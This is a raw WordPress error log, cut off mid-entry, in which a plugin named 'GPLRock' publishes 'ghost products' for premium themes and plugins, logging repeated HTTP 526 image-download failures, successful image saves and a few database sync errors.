https://meldwp.com/wp-content/uploads/rehub---price-comparison-multi-vendor-marketplace-wordpress-theme-1276.webp [05-Apr-2026 09:33:53 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: rehub-price-comparison-multi-vendor-marketplace-wordpress-theme [05-Apr-2026 09:33:53 UTC] GPLRock: Image download failed for product miti-elementor-fashion-woocommerce-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 09:33:56 UTC] GPLRock: Image download failed for product miti-elementor-fashion-woocommerce-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 09:33:58 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/miti---elementor-fashion-woocommerce-theme-13529.webp for product miti-elementor-fashion-woocommerce-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 09:33:58 UTC] GPLRock: Image download failed for product miti-elementor-fashion-woocommerce-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 09:34:00 UTC] GPLRock: Image download failed for product miti-elementor-fashion-woocommerce-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 09:34:02 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/miti---elementor-fashion-woocommerce-theme-13529.webp for product miti-elementor-fashion-woocommerce-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 09:34:02 UTC] GPLRock WARNING: Image download failed for product miti-elementor-fashion-woocommerce-theme. URL: https://meldwp.com/wp-content/uploads/miti---elementor-fashion-woocommerce-theme-13529.webp [05-Apr-2026 09:34:02 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: miti-elementor-fashion-woocommerce-theme [05-Apr-2026 09:34:03 UTC] GPLRock: Image download failed for product factory-hub-industry-and-construction-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 09:34:05 UTC] GPLRock: Image download failed for product factory-hub-industry-and-construction-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 09:34:07 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/factory-hub---industry-and-construction-wordpress-theme-19401.webp for product factory-hub-industry-and-construction-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 09:34:07 UTC] GPLRock: Image download failed for product factory-hub-industry-and-construction-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 09:34:09 UTC] GPLRock: Image download failed for product factory-hub-industry-and-construction-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 09:34:11 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/factory-hub---industry-and-construction-wordpress-theme-19401.webp for product factory-hub-industry-and-construction-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 09:34:11 UTC] GPLRock WARNING: Image download failed for product factory-hub-industry-and-construction-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/factory-hub---industry-and-construction-wordpress-theme-19401.webp [05-Apr-2026 09:34:11 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: factory-hub-industry-and-construction-wordpress-theme [05-Apr-2026 09:34:12 UTC] GPLRock: Image download failed for product morvan-elegant-woocommerce-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 09:34:14 UTC] GPLRock: Image download failed for product morvan-elegant-woocommerce-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 09:34:16 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/morvan---elegant-woocommerce-theme-10767.webp for product morvan-elegant-woocommerce-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 09:34:16 UTC] GPLRock: Image download failed for product morvan-elegant-woocommerce-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 09:34:18 UTC] GPLRock: Image download failed for product morvan-elegant-woocommerce-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 09:34:20 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/morvan---elegant-woocommerce-theme-10767.webp for product morvan-elegant-woocommerce-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 09:34:20 UTC] GPLRock WARNING: Image download failed for product morvan-elegant-woocommerce-theme. URL: https://meldwp.com/wp-content/uploads/morvan---elegant-woocommerce-theme-10767.webp [05-Apr-2026 09:34:20 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: morvan-elegant-woocommerce-theme [05-Apr-2026 09:34:20 UTC] GPLRock: Image download failed for product agrimo-agriculture-organic-farm-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 09:34:23 UTC] GPLRock: Image download failed for product agrimo-agriculture-organic-farm-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 09:34:25 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/agrimo---agriculture--organic-farm-wordpress-theme-29955.webp for product agrimo-agriculture-organic-farm-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 09:34:25 UTC] GPLRock: Image download failed for product agrimo-agriculture-organic-farm-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 09:34:27 UTC] GPLRock: Image download failed for product agrimo-agriculture-organic-farm-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 09:34:29 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/agrimo---agriculture--organic-farm-wordpress-theme-29955.webp for product agrimo-agriculture-organic-farm-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 09:34:29 UTC] GPLRock WARNING: Image download failed for product agrimo-agriculture-organic-farm-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/agrimo---agriculture--organic-farm-wordpress-theme-29955.webp [05-Apr-2026 09:34:29 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: agrimo-agriculture-organic-farm-wordpress-theme [05-Apr-2026 09:34:29 UTC] GPLRock: Image download failed for product split-wordpress-cvvcard-template (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 09:34:31 UTC] GPLRock: Image download failed for product split-wordpress-cvvcard-template (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 09:34:33 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/split--wordpress-cvvcard-template-26310.webp for product split-wordpress-cvvcard-template after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 09:34:33 UTC] GPLRock: Image download failed for product split-wordpress-cvvcard-template (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 09:34:35 UTC] GPLRock: Image download failed for product split-wordpress-cvvcard-template (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 09:34:38 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/split--wordpress-cvvcard-template-26310.webp for product split-wordpress-cvvcard-template after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 09:34:38 UTC] GPLRock WARNING: Image download failed for product split-wordpress-cvvcard-template. URL: https://meldwp.com/wp-content/uploads/split--wordpress-cvvcard-template-26310.webp [05-Apr-2026 09:34:38 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: split-wordpress-cvvcard-template [05-Apr-2026 09:34:38 UTC] GPLRock: Image download failed for product micra-multipurpose-responsive-woocommerce-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 09:34:40 UTC] GPLRock: Image download failed for product micra-multipurpose-responsive-woocommerce-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 09:34:42 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/micra---multipurpose-responsive-woocommerce-wordpress-theme-29829.webp for product micra-multipurpose-responsive-woocommerce-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 09:34:42 UTC] GPLRock: Image download failed for product micra-multipurpose-responsive-woocommerce-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 09:34:44 UTC] GPLRock: Image download failed for product micra-multipurpose-responsive-woocommerce-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 09:34:46 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/micra---multipurpose-responsive-woocommerce-wordpress-theme-29829.webp for product micra-multipurpose-responsive-woocommerce-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 09:34:46 UTC] GPLRock WARNING: Image download failed for product micra-multipurpose-responsive-woocommerce-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/micra---multipurpose-responsive-woocommerce-wordpress-theme-29829.webp [05-Apr-2026 09:34:46 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: micra-multipurpose-responsive-woocommerce-wordpress-theme [05-Apr-2026 09:35:13 UTC] GPLRock: Image downloaded successfully for product download-monitor-captcha (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-24a6c8c7.jpg [05-Apr-2026 09:35:13 UTC] GPLRock: Using pre-downloaded image for product download-monitor-captcha: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-24a6c8c7.jpg [05-Apr-2026 09:35:13 UTC] GPLRock: Ghost product published with image - Product ID: download-monitor-captcha [05-Apr-2026 09:35:15 UTC] GPLRock: Image downloaded successfully for product download-monitor-page-addon (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-07e7e046.jpg [05-Apr-2026 09:35:15 UTC] GPLRock: Using pre-downloaded image for product download-monitor-page-addon: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-07e7e046.jpg [05-Apr-2026 09:35:15 UTC] GPLRock: Ghost product published with image - Product ID: download-monitor-page-addon [05-Apr-2026 09:35:16 UTC] GPLRock: Image downloaded successfully for product startit-a-fresh-startup-business-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-05bff490.jpg [05-Apr-2026 09:35:16 UTC] GPLRock: Using pre-downloaded image for product startit-a-fresh-startup-business-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-05bff490.jpg [05-Apr-2026 09:35:16 UTC] GPLRock: Ghost product published with image - Product ID: startit-a-fresh-startup-business-theme [05-Apr-2026 09:35:18 UTC] GPLRock: Image downloaded successfully for product mythemeshop-ecommerce-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-f1aff26e.jpg [05-Apr-2026 09:35:18 UTC] GPLRock: Using pre-downloaded image for product mythemeshop-ecommerce-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-f1aff26e.jpg [05-Apr-2026 09:35:18 UTC] GPLRock: Ghost product published with image - Product ID: mythemeshop-ecommerce-wordpress-theme [05-Apr-2026 09:35:19 UTC] GPLRock: Image downloaded successfully for product deblocker-anti-adblock-for-wordpress (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-39d10a9c.jpg [05-Apr-2026 09:35:19 UTC] GPLRock: Using pre-downloaded image for product deblocker-anti-adblock-for-wordpress: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-39d10a9c.jpg [05-Apr-2026 09:35:19 UTC] GPLRock: Ghost product published with image - Product ID: deblocker-anti-adblock-for-wordpress [05-Apr-2026 09:35:21 UTC] GPLRock: Image downloaded successfully for product yith-donations-for-woocommerce-premium (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-16214dc0.jpg [05-Apr-2026 09:35:21 UTC] GPLRock: Using pre-downloaded image for product yith-donations-for-woocommerce-premium: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-16214dc0.jpg [05-Apr-2026 09:35:21 UTC] GPLRock: Ghost product published with image - Product ID: yith-donations-for-woocommerce-premium [05-Apr-2026 09:35:22 UTC] GPLRock: Image downloaded successfully for product massive-cryptocurrency-widgets-crypto-plugin (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-2e267ca5.jpg [05-Apr-2026 09:35:22 UTC] GPLRock: Using pre-downloaded image for product massive-cryptocurrency-widgets-crypto-plugin: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-2e267ca5.jpg [05-Apr-2026 09:35:22 UTC] GPLRock: Ghost product published with image - Product ID: massive-cryptocurrency-widgets-crypto-plugin [05-Apr-2026 09:35:23 UTC] GPLRock: Image downloaded successfully for product oceanwp-full-screen (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-b549808e.jpg [05-Apr-2026 09:35:23 UTC] GPLRock: Using pre-downloaded image for product oceanwp-full-screen: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-b549808e.jpg [05-Apr-2026 09:35:23 UTC] GPLRock: Ghost product published with image - Product ID: oceanwp-full-screen [05-Apr-2026 09:35:25 UTC] GPLRock: Image downloaded successfully for product analytify-pro-google-analytics-plugin (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-946756f5.jpg [05-Apr-2026 09:35:25 UTC] GPLRock: Using pre-downloaded image for product analytify-pro-google-analytics-plugin: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-946756f5.jpg [05-Apr-2026 09:35:25 UTC] GPLRock: Ghost product published with image - Product ID: analytify-pro-google-analytics-plugin [05-Apr-2026 09:35:27 UTC] GPLRock: Image downloaded successfully for product accesspress-social-login (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-49135245.jpg [05-Apr-2026 09:35:27 UTC] GPLRock: Using pre-downloaded image for product accesspress-social-login: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-49135245.jpg [05-Apr-2026 09:35:27 UTC] GPLRock: Ghost product published with image - Product ID: accesspress-social-login [05-Apr-2026 09:36:48 UTC] GPLRock: Image download failed for product video-reviews-pro-video-widget-wordpress-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 09:36:50 UTC] GPLRock: Image download failed for product video-reviews-pro-video-widget-wordpress-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 09:36:52 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/video-reviews-pro---video-widget-wordpress-plugin-28691.webp for product video-reviews-pro-video-widget-wordpress-plugin after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 09:36:53 UTC] GPLRock: Image download failed for product video-reviews-pro-video-widget-wordpress-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 09:36:55 UTC] GPLRock: Image download failed for product video-reviews-pro-video-widget-wordpress-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 09:36:57 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/video-reviews-pro---video-widget-wordpress-plugin-28691.webp for product video-reviews-pro-video-widget-wordpress-plugin after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 09:36:57 UTC] GPLRock WARNING: Image download failed for product video-reviews-pro-video-widget-wordpress-plugin. URL: https://meldwp.com/wp-content/uploads/video-reviews-pro---video-widget-wordpress-plugin-28691.webp [05-Apr-2026 09:36:57 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: video-reviews-pro-video-widget-wordpress-plugin [05-Apr-2026 09:36:57 UTC] GPLRock: Image download failed for product ai-bundle-wordpress-ai-writer-chatbot-image-generator-text-to-speech-openai-stable-diffusion (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 09:36:59 UTC] GPLRock: Image download failed for product ai-bundle-wordpress-ai-writer-chatbot-image-generator-text-to-speech-openai-stable-diffusion (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 09:37:01 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/ai-bundle-wordpress-ai-writer-chatbot-image-generator-text-to-speech-openai-stab-29060.webp for product ai-bundle-wordpress-ai-writer-chatbot-image-generator-text-to-speech-openai-stable-diffusion after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 09:37:01 UTC] GPLRock: Image download failed for product ai-bundle-wordpress-ai-writer-chatbot-image-generator-text-to-speech-openai-stable-diffusion (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 09:37:03 UTC] GPLRock: Image download failed for product ai-bundle-wordpress-ai-writer-chatbot-image-generator-text-to-speech-openai-stable-diffusion (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 09:47:17 UTC] GPLRock: Image downloaded successfully for product wpfomify-give-addon (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-a5a1cd12.jpg [05-Apr-2026 09:47:17 UTC] GPLRock: Using pre-downloaded image for product wpfomify-give-addon: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-a5a1cd12.jpg [05-Apr-2026 09:47:17 UTC] GPLRock: Ghost product published with image - Product ID: wpfomify-give-addon [05-Apr-2026 09:47:18 UTC] GPLRock: Image downloaded successfully for product ultimate-member-user-bookmarks-addon (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-0fe1f5ba.jpg [05-Apr-2026 09:47:18 UTC] GPLRock: Using pre-downloaded image for product ultimate-member-user-bookmarks-addon: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-0fe1f5ba.jpg [05-Apr-2026 09:47:18 UTC] GPLRock: Ghost product published with image - Product ID: ultimate-member-user-bookmarks-addon [05-Apr-2026 09:47:20 UTC] GPLRock: Image downloaded successfully for product coiffeur-hair-salon-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-433500c7.jpg [05-Apr-2026 09:47:20 UTC] GPLRock: Using pre-downloaded image for product coiffeur-hair-salon-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-433500c7.jpg [05-Apr-2026 09:47:20 UTC] GPLRock: Ghost product published with image - Product ID: coiffeur-hair-salon-wordpress-theme [05-Apr-2026 09:47:22 UTC] GPLRock: Image downloaded successfully for product mainwp-backwpup (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-9be75610.jpg [05-Apr-2026 09:47:22 UTC] GPLRock: Using pre-downloaded image for product mainwp-backwpup: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-9be75610.jpg [05-Apr-2026 09:47:22 UTC] GPLRock: Ghost product published with image - Product ID: mainwp-backwpup [05-Apr-2026 09:47:23 UTC] GPLRock: Image downloaded successfully for product wp-job-manager-apply-with-facebook-addon (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-e17d6773.jpg [05-Apr-2026 09:47:23 UTC] GPLRock: Using pre-downloaded image for product wp-job-manager-apply-with-facebook-addon: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-e17d6773.jpg [05-Apr-2026 09:47:23 UTC] GPLRock: Ghost product published with image - Product ID: wp-job-manager-apply-with-facebook-addon [05-Apr-2026 09:47:25 UTC] GPLRock: Image downloaded successfully for product studiopress-milan-pro-genesis-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-98bb56ab.jpg [05-Apr-2026 09:47:25 UTC] GPLRock: Using pre-downloaded image for product studiopress-milan-pro-genesis-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-98bb56ab.jpg [05-Apr-2026 09:47:25 UTC] GPLRock: Ghost product published with image - Product ID: studiopress-milan-pro-genesis-wordpress-theme [05-Apr-2026 09:47:26 UTC] GPLRock: Image downloaded successfully for product searchwp-diagnostics (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-b81484fe.jpg [05-Apr-2026 09:47:26 UTC] GPLRock: Using pre-downloaded image for product searchwp-diagnostics: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-b81484fe.jpg [05-Apr-2026 09:47:26 UTC] GPLRock: Ghost product published with image - Product ID: searchwp-diagnostics [05-Apr-2026 09:47:28 UTC] GPLRock: Image downloaded successfully for product geodirectory-affiliatewp-integration (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-50d88257.jpg [05-Apr-2026 09:47:28 UTC] GPLRock: Using pre-downloaded image for product geodirectory-affiliatewp-integration: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-50d88257.jpg [05-Apr-2026 09:47:28 UTC] GPLRock: Ghost product published with image - Product ID: geodirectory-affiliatewp-integration [05-Apr-2026 09:47:29 UTC] GPLRock: Image downloaded successfully for product woocommerce-wooslider (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-441b8f0c.jpg [05-Apr-2026 09:47:29 UTC] GPLRock: Using pre-downloaded image for product woocommerce-wooslider: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-441b8f0c.jpg [05-Apr-2026 09:47:29 UTC] GPLRock: Ghost product published with image - Product ID: woocommerce-wooslider [05-Apr-2026 09:47:31 UTC] GPLRock: Image downloaded successfully for product super-forms-password-protect-user-lockout-hide (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-e47e2517.jpg [05-Apr-2026 09:47:31 UTC] GPLRock: Using pre-downloaded image for product super-forms-password-protect-user-lockout-hide: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-e47e2517.jpg [05-Apr-2026 09:47:31 UTC] GPLRock: Ghost product published with image - Product ID: super-forms-password-protect-user-lockout-hide [05-Apr-2026 09:47:32 UTC] WordPress database error Commands out of sync; you can't run this command now for query SELECT option_name, option_value FROM wpwf_options WHERE option_name IN ('_transient_doing_cron','_transient_timeout_doing_cron') made by shutdown_action_hook, do_action('shutdown'), WP_Hook->do_action, WP_Hook->apply_filters, _wp_cron, spawn_cron, get_transient, wp_prime_option_caches [05-Apr-2026 09:47:32 UTC] WordPress database error Commands out of sync; you can't run this command now for query INSERT INTO `wpwf_options` (`option_name`, `option_value`, `autoload`) VALUES ('_transient_doing_cron', '1775382452.4465379714965820312500', 'on') ON DUPLICATE KEY UPDATE `option_name` = VALUES(`option_name`), `option_value` = VALUES(`option_value`), `autoload` = VALUES(`autoload`) made by shutdown_action_hook, do_action('shutdown'), WP_Hook->do_action, WP_Hook->apply_filters, _wp_cron, spawn_cron, set_transient, add_option [05-Apr-2026 09:48:29 UTC] GPLRock: Image downloaded successfully for product side-tabs-layered-popups-add-on (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-3ccdc217.jpg [05-Apr-2026 09:48:29 UTC] GPLRock: Using pre-downloaded image for product side-tabs-layered-popups-add-on: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-3ccdc217.jpg [05-Apr-2026 09:48:29 UTC] GPLRock: Ghost product published with image - Product ID: side-tabs-layered-popups-add-on [05-Apr-2026 09:48:31 UTC] GPLRock: Image downloaded successfully for product central-versatile-multi-purpose-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-fe8a89f3.jpg [05-Apr-2026 09:48:31 UTC] GPLRock: Using pre-downloaded image for product central-versatile-multi-purpose-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-fe8a89f3.jpg [05-Apr-2026 09:48:31 UTC] GPLRock: Ghost product published with image - Product ID: central-versatile-multi-purpose-wordpress-theme [05-Apr-2026 09:48:33 UTC] GPLRock: Image downloaded successfully for product facebook-feed-wordpress-facebook-plugin (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-5da8a8c1.jpg [05-Apr-2026 09:48:33 UTC] GPLRock: Using pre-downloaded image for product facebook-feed-wordpress-facebook-plugin: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-5da8a8c1.jpg [05-Apr-2026 09:48:33 UTC] GPLRock: Ghost product published with image - Product ID: facebook-feed-wordpress-facebook-plugin [05-Apr-2026 09:48:34 UTC] GPLRock: Image downloaded successfully for product mainwp-woocommerce-shortcuts (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-ac7ea5f7.jpg [05-Apr-2026 09:48:34 UTC] GPLRock: Using pre-downloaded image for product mainwp-woocommerce-shortcuts: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-ac7ea5f7.jpg [05-Apr-2026 09:48:34 UTC] GPLRock: Ghost product published with image - Product ID: mainwp-woocommerce-shortcuts [05-Apr-2026 09:48:36 UTC] GPLRock: Image downloaded successfully for product css-igniter-sixtyone-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-8642dc49.jpg [05-Apr-2026 09:48:36 UTC] GPLRock: Using pre-downloaded image for product css-igniter-sixtyone-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-8642dc49.jpg [05-Apr-2026 09:48:36 UTC] GPLRock: Ghost product published with image - Product ID: css-igniter-sixtyone-wordpress-theme [05-Apr-2026 09:48:38 UTC] GPLRock: Image downloaded successfully for product css-igniter-noozbeat-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-a7746acb.jpg [05-Apr-2026 09:48:38 UTC] GPLRock: Using pre-downloaded image for product css-igniter-noozbeat-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-a7746acb.jpg [05-Apr-2026 09:48:38 UTC] GPLRock: Ghost product published with image - Product ID: css-igniter-noozbeat-wordpress-theme [05-Apr-2026 09:48:39 UTC] GPLRock: Image downloaded successfully for product wpmu-dev-jobs-and-experts (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-48685d95.jpg [05-Apr-2026 09:48:39 UTC] GPLRock: Using pre-downloaded image for product wpmu-dev-jobs-and-experts: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-48685d95.jpg [05-Apr-2026 09:48:39 UTC] GPLRock: Ghost product published with image - Product ID: wpmu-dev-jobs-and-experts [05-Apr-2026 09:48:41 UTC] GPLRock: Image downloaded successfully for product eco-recycling-ecology-nature-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-be5e5850.jpg [05-Apr-2026 09:48:41 UTC] GPLRock: Using pre-downloaded image for product eco-recycling-ecology-nature-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-be5e5850.jpg [05-Apr-2026 09:48:41 UTC] GPLRock: Ghost product published with image - Product ID: eco-recycling-ecology-nature-wordpress-theme [05-Apr-2026 09:48:43 UTC] GPLRock: Image downloaded successfully for product studiopress-executive-pro-genesis-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-2bfdf998.jpg [05-Apr-2026 09:48:43 UTC] GPLRock: Using pre-downloaded image for product studiopress-executive-pro-genesis-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-2bfdf998.jpg [05-Apr-2026 09:48:43 UTC] GPLRock: Ghost product published with image - Product ID: studiopress-executive-pro-genesis-wordpress-theme [05-Apr-2026 09:58:39 UTC] GPLRock: Image downloaded successfully for product envira-gallery-pinterest-addon (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-8a5c8af4.jpg [05-Apr-2026 09:58:39 UTC] GPLRock: Using pre-downloaded image for product envira-gallery-pinterest-addon: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-8a5c8af4.jpg [05-Apr-2026 09:58:39 UTC] GPLRock: Ghost product published with image - Product ID: envira-gallery-pinterest-addon [05-Apr-2026 09:58:40 UTC] GPLRock: Image downloaded successfully for product envira-gallery-gallery-themes-addon (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-d52cd071.jpg [05-Apr-2026 09:58:40 UTC] GPLRock: Using pre-downloaded image for product envira-gallery-gallery-themes-addon: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-d52cd071.jpg [05-Apr-2026 